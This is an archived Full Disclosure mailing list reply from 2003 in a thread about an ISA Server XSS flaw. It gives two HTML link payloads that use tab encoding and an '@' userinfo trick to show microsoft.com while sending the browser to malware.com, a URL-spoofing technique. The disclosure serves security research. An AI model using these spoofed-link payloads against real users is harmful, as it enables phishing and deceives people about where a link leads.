Full Disclosure mailing list archives

Re: Microsoft ISA Server HTTP error handler XSS (TL#007)

From: "http-equiv () excite com" <1 () malware com>
Date: Sat, 19 Jul 2003 14:09:31 -0000


<A href="http://%09%09%09%09%09%09%09 
09www.malware.com">http://www.microsoft.com</A>


The following will represent a true status and a false destination:


<A href="http://www.microsoft.com%09%09%09@%09%09%09%09%09%09 
09www.malware.com">http://www.microsoft.com</A>



-- 
http://www.malware.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Microsoft ISA Server HTTP error handler XSS (TL#007) Thor Larholm (Jul 16)
- <Possible follow-ups>
- Re: Microsoft ISA Server HTTP error handler XSS (TL#007) http-equiv () excite com (Jul 16)
- Re: Microsoft ISA Server HTTP error handler XSS (TL#007) http-equiv () excite com (Jul 19)